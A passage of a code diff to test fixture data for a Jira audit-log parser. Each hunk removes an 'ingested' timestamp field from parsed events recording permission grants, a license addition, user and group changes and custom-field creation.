Change\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-software-users\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":581000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -243,7 +240,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:20.169932188Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Create Shared Objects\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-software-users\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":583000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -319,7 +315,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:20.169932943Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Group Filter Subscriptions\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-software-users\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":584000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -395,7 +390,6 @@ }, "event": { "action": "jira.auditing.system.license.added", - "ingested": "2021-12-24T00:58:20.169933782Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"SEN-L17782970\",\"type\":\"LICENSE\"}],\"auditType\":{\"action\":\"New license added\",\"actionI18nKey\":\"jira.auditing.system.license.added\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"system\",\"categoryI18nKey\":\"jira.auditing.category.system\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"admin.license.organisation\",\"key\":\"Organization\",\"to\":\"myself\"},{\"i18nKey\":\"admin.license.date.purchased\",\"key\":\"Date Purchased\",\"to\":\"21/Nov/21\"},{\"i18nKey\":\"admin.license.type\",\"key\":\"License Type\",\"to\":\"Jira Software (Data Center): Evaluation\"},{\"i18nKey\":\"admin.server.id\",\"key\":\"Server ID\",\"to\":\"BGD5-PMSH-258I-VTTW\"},{\"i18nKey\":\"admin.license.sen\",\"key\":\"Support Entitlement Number (SEN)\",\"to\":\"SEN-L17782970\"},{\"i18nKey\":\"admin.license.user.limit\",\"key\":\"User Limit\",\"to\":\"Unlimited\"},{\"i18nKey\":\"jira-software\",\"key\":\"jira-software\",\"to\":\"-1\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":596000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -491,7 +485,6 @@ }, "event": { "action": "jira.auditing.user.created", - "ingested": "2021-12-24T00:58:20.169934600Z", "original": "{\"affectedObjects\":[{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User created\",\"actionI18nKey\":\"jira.auditing.user.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"user management\",\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.username\",\"key\":\"Username\",\"to\":\"test.user\"},{\"i18nKey\":\"common.words.fullname\",\"key\":\"Full name\",\"to\":\"Alex\"},{\"i18nKey\":\"common.words.email\",\"key\":\"Email\",\"to\":\"test.user@example.com\"},{\"i18nKey\":\"admin.common.phrases.active.inactive\",\"key\":\"Active / Inactive\",\"to\":\"Active\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":600000000},\"version\":\"1.0\"}", "type": [ "user", @@ -587,7 +580,6 @@ }, "event": { "action": "jira.auditing.user.added.to.group", - "ingested": "2021-12-24T00:58:20.169935449Z", "original": "{\"affectedObjects\":[{\"name\":\"jira-administrators\",\"type\":\"GROUP\"},{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"jira.auditing.user.added.to.group\",\"area\":\"USER_MANAGEMENT\",\"category\":\"group management\",\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":734000000},\"version\":\"1.0\"}", "type": [ "group", 
@@ -662,7 +654,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:20.169936232Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Bulk Change\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":750000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -738,7 +729,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:20.169937016Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Browse Users\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":751000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -814,7 +804,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:20.169937821Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Create Shared Objects\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":752000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -890,7 +879,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:20.169938827Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Group Filter Subscriptions\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":754000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -967,7 +955,6 @@ }, "event": { "action": "jira.auditing.user.added.to.group", - "ingested": "2021-12-24T00:58:20.169939647Z", "original": "{\"affectedObjects\":[{\"name\":\"jira-software-users\",\"type\":\"GROUP\"},{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"jira.auditing.user.added.to.group\",\"area\":\"USER_MANAGEMENT\",\"category\":\"group management\",\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":756000000},\"version\":\"1.0\"}", "type": [ "group", 
@@ -1042,7 +1029,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169940398Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539617,\"nano\":138000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1117,7 +1103,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169941136Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"Manage Sprints\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"\"},{\"from\":\"Project Role\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"\"},{\"from\":\"Administrators\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539617,\"nano\":158000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1192,7 +1177,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169941928Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539617,\"nano\":162000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1267,7 +1251,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169942833Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10100\",\"name\":\"Team\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Team\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Team\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539618,\"nano\":318000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1337,7 +1320,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169943562Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10101\",\"name\":\"Parent Link\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Parent Link\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Parent Link\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539618,\"nano\":974000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1407,7 +1389,6 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-24T00:58:20.169944689Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10101\",\"name\":\"Parent Link\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field updated\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539618,\"nano\":990000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1465,7 +1446,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169945488Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10102\",\"name\":\"Target start\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Target start\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"The targeted start date. This custom field is created and required by Portfolio for Jira.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Target start\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":224000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1540,7 +1520,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169946221Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10103\",\"name\":\"Target end\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Target end\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"The targeted end date. This custom field is created and required by Portfolio for Jira.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Target end\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":266000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1615,7 +1594,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169946963Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10104\",\"name\":\"Original story points\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Original story points\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Original story points\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":313000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1685,7 +1663,6 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-24T00:58:20.169947694Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10102\",\"name\":\"Target start\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field updated\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":332000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1743,7 +1720,6 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-24T00:58:20.169948666Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10103\",\"name\":\"Target end\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field updated\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":340000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1801,7 +1777,6 @@ }, "event": { "action": "jira.auditing.issue.type.created", - "ingested": "2021-12-24T00:58:20.169949419Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Epic\",\"type\":\"ISSUE_TYPE\"}],\"auditType\":{\"action\":\"Issue type created\",\"actionI18nKey\":\"jira.auditing.issue.type.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"issue types\",\"categoryI18nKey\":\"jira.auditing.category.issuetypes\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":485000000},\"version\":\"1.0\"}", "type": [ "creation" 
@@ -1864,7 +1839,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169950144Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10105\",\"name\":\"Epic Name\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Epic Name\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Provide a short name to identify this epic.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Name of Epic\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":522000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1939,7 +1913,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169950890Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10106\",\"name\":\"Epic Status\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Epic Status\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Epic Status field for Jira Software use only.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Status of Epic\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539621,\"nano\":644000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2014,7 +1987,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169951970Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10107\",\"name\":\"Epic Colour\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Epic Colour\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Epic Colour field for Jira Software use only.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Colour of Epic\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539621,\"nano\":669000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2089,7 +2061,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169952754Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10108\",\"name\":\"Sprint\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Sprint\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Jira Software sprint field\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Jira Sprint Field\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539622,\"nano\":694000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2164,7 +2135,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169953511Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10109\",\"name\":\"Epic Link\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Epic Link\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Choose an epic to assign this issue to.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Epic Link Relationship\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539622,\"nano\":725000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
